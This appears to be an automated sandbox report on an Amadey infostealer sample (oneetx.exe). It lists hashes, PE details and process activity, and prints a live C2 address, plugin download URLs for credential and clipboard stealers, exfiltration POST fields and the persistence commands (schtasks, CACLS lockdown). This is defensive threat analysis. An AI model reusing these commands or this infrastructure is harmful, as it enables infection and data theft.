File name: | oneetx.exe |
Full analysis: | https://app.any.run/tasks/cc976c28-df2a-4875-9a7d-13425eca71ba |
Verdict: | Malicious activity |
Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
Analysis date: | May 16, 2023, 16:30:08 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5: | 13C6B003E4CD8319299A50A51E14A222 |
SHA1: | 00F9E5A0204DEFD1A569BFBDF0C690B351349DDE |
SHA256: | 28F5E5E43A67A48C6A41F9814A50B6FAF5D20DFEE6B17E867429EFCA82394681 |
SSDEEP: | 6144:tWh1VL9EWeJanEYL7OuuT7Ujz41FiPRL:tg1VdSYL3uT7e0KF |
.exe | | | Win64 Executable (generic) (64.6) |
---|---|---|
.dll | | | Win32 Dynamic Link Library (generic) (15.4) |
.exe | | | Win32 Executable (generic) (10.5) |
.exe | | | Generic Win/DOS Executable (4.6) |
.exe | | | DOS Executable Generic (4.6) |
MachineType: | Intel 386 or later, and compatibles |
---|---|
TimeStamp: | 2023:05:03 13:44:14+00:00 |
ImageFileCharacteristics: | Executable, 32-bit |
PEType: | PE32 |
LinkerVersion: | 14.24 |
CodeSize: | 167424 |
InitializedDataSize: | 51712 |
UninitializedDataSize: | - |
EntryPoint: | 0x16e1f |
OSVersion: | 6 |
ImageVersion: | - |
SubsystemVersion: | 6 |
Subsystem: | Windows GUI |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 03-May-2023 13:44:14 |
Detected languages: |
|
Debug artifacts: |
|
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000100 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 5 |
Time date stamp: | 03-May-2023 13:44:14 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x00028C3D | 0x00028E00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.42776 |
.rdata | 0x0002A000 | 0x00007F76 | 0x00008000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.06123 |
.data | 0x00032000 | 0x00002468 | 0x00001800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 1.36547 |
.rsrc | 0x00035000 | 0x000001E0 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.7123 |
.reloc | 0x00036000 | 0x0000217C | 0x00002200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.63063 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 4.91161 | 381 | UNKNOWN | English - United States | RT_MANIFEST |
ADVAPI32.dll |
GDI32.dll |
KERNEL32.dll |
SHELL32.dll |
USER32.dll |
WININET.dll |
gdiplus.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2472 | "C:\Users\admin\AppData\Local\Temp\oneetx.exe" | C:\Users\admin\AppData\Local\Temp\oneetx.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
2812 | "C:\Users\admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe" | C:\Users\admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe | oneetx.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Modules
Amadey(PID) Process(2812) oneetx.exe C2 (1)http://95.214.26.53 Version3.81 Options Drop directory6fd2e6071d Drop nameoneetx.exe Strings (116)SCHTASKS /Create /SC MINUTE /MO 1 /TN /TR " " /F SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup Rem cmd /C RMDIR /s/q SOFTWARE\Microsoft\Windows\CurrentVersion\Run rundll32 /Delete /TN " Programs SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders %USERPROFILE% \App POST GET id= &vs= &sd= &os= &bi= &ar= &pc= &un= &dm= &av= &lv= &og= cred.dll|clip.dll| d1 e1 e0 Main http:// https:// exe dll cmd ps1 <c> <d> Plugins/ +++ # | &unit= = shell32.dll kernel32.dll GetNativeSystemInfo ProgramData\ AVAST Software Avira Kaspersky Lab ESET Panda Security Doctor Web AVG 360TotalSecurity Bitdefender Norton Sophos Comodo WinDefender 0123456789 rb wb Content-Type: multipart/form-data; boundary=---- ------ Content-Disposition: form-data; name="data"; filename=" "
Content-Type: application/octet-stream ------ -- ?scr=1 .jpg Content-Type: application/x-www-form-urlencoded SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName ComputerName abcdefghijklmnopqrstuvwxyz0123456789-_ -unicode- SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\ SYSTEM\ControlSet001\Services\BasicDisplay\Video VideoID \0000 DefaultSettings.XResolution DefaultSettings.YResolution SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductName 2019 2022 2016 CurrentBuild && echo Y|CACLS " " /P " :N" CACLS " " /P " :R" /E :F" /E &&Exit ..\ \ ::: rundll32.exe /k "taskkill /f /im " " && timeout 1 && del && Exit" " && ren && Powershell.exe -executionpolicy remotesigned -File " " | |||||||||||||||
3064 | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F | C:\Windows\SysWOW64\schtasks.exe | — | oneetx.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2124 | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "admin:N"&&CACLS "oneetx.exe" /P "admin:R" /E&&echo Y|CACLS "..\6fd2e6071d" /P "admin:N"&&CACLS "..\6fd2e6071d" /P "admin:R" /E&&Exit | C:\Windows\SysWOW64\cmd.exe | — | oneetx.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2432 | C:\Windows\system32\cmd.exe /S /D /c" echo Y" | C:\Windows\SysWOW64\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2496 | CACLS "oneetx.exe" /P "admin:N" | C:\Windows\SysWOW64\cacls.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Control ACLs Program Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2676 | CACLS "oneetx.exe" /P "admin:R" /E | C:\Windows\SysWOW64\cacls.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Control ACLs Program Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2756 | C:\Windows\system32\cmd.exe /S /D /c" echo Y" | C:\Windows\SysWOW64\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2804 | CACLS "..\6fd2e6071d" /P "admin:N" | C:\Windows\SysWOW64\cacls.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Control ACLs Program Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2944 | CACLS "..\6fd2e6071d" /P "admin:R" /E | C:\Windows\SysWOW64\cacls.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Control ACLs Program Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (2472) oneetx.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (2472) oneetx.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (2472) oneetx.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (2472) oneetx.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (2812) oneetx.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
Operation: | write | Name: | Startup |
Value: %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | |||
(PID) Process: | (2812) oneetx.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (2812) oneetx.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (2812) oneetx.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (2812) oneetx.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (2812) oneetx.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
Operation: | write | Name: | CachePrefix |
Value: Cookie: |
PID | Process | Filename | Type | |
---|---|---|---|---|
2812 | oneetx.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\cred64[1].dll | executable | |
MD5:A995FDE990914D0AE4278AF25213CAC0 | SHA256:AF4DDFD4D441C924A034EF6BF800B07AC0BCFDF42616EF64178F2487C1D917E8 | |||
2812 | oneetx.exe | C:\Users\admin\AppData\Roaming\27d75989acd3e0\cred64.dll | executable | |
MD5:A995FDE990914D0AE4278AF25213CAC0 | SHA256:AF4DDFD4D441C924A034EF6BF800B07AC0BCFDF42616EF64178F2487C1D917E8 | |||
2472 | oneetx.exe | C:\Users\admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe | executable | |
MD5:13C6B003E4CD8319299A50A51E14A222 | SHA256:28F5E5E43A67A48C6A41F9814A50B6FAF5D20DFEE6B17E867429EFCA82394681 | |||
2812 | oneetx.exe | C:\Users\admin\AppData\Roaming\27d75989acd3e0\clip64.dll | executable | |
MD5:FB32CE419C5BEA931A9E3C4AD70DEC00 | SHA256:6E77875E1EF76B39CFC68D919B4919DA77D320BF208D826B643BD7BA48A5B38C | |||
2812 | oneetx.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\clip64[1].dll | executable | |
MD5:FB32CE419C5BEA931A9E3C4AD70DEC00 | SHA256:6E77875E1EF76B39CFC68D919B4919DA77D320BF208D826B643BD7BA48A5B38C | |||
2812 | oneetx.exe | C:\Users\admin\AppData\Local\Temp\896776584425 | image | |
MD5:2CEC7B7022A7578A68119A9EA37D9E1F | SHA256:771557716C31EE6667092DB2370BD79E853FBF075ACE3401B5A4B3F0569403F0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2812 | oneetx.exe | GET | 200 | 95.214.26.53:80 | http://95.214.26.53/J84hHFuefh2/Plugins/cred64.dll | US | executable | 1.04 Mb | malicious |
2812 | oneetx.exe | GET | 200 | 95.214.26.53:80 | http://95.214.26.53/J84hHFuefh2/Plugins/clip64.dll | US | executable | 89.0 Kb | malicious |
2812 | oneetx.exe | POST | 200 | 95.214.26.53:80 | http://95.214.26.53/J84hHFuefh2/index.php | US | text | 6 b | malicious |
2812 | oneetx.exe | POST | 200 | 95.214.26.53:80 | http://95.214.26.53/J84hHFuefh2/index.php?scr=1 | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
328 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
2812 | oneetx.exe | 95.214.26.53:80 | — | Enes Koken | US | malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Malware Command and Control Activity Detected | ET MALWARE Amadey CnC Check-In |
— | — | A Network Trojan was detected | AV TROJAN Agent.DHOA System Info Exfiltration |
— | — | A Network Trojan was detected | ET MALWARE Amadey Bot Activity (POST) |
— | — | Potentially Bad Traffic | ET INFO Dotted Quad Host DLL Request |
— | — | Potential Corporate Privacy Violation | AV POLICY HTTP request for .dll file with no User-Agent |
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
— | — | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
— | — | Generic Protocol Command Decode | SURICATA STREAM ESTABLISHED packet out of window |
— | — | Generic Protocol Command Decode | SURICATA STREAM ESTABLISHED packet out of window |
— | — | Generic Protocol Command Decode | SURICATA STREAM ESTABLISHED invalid ack |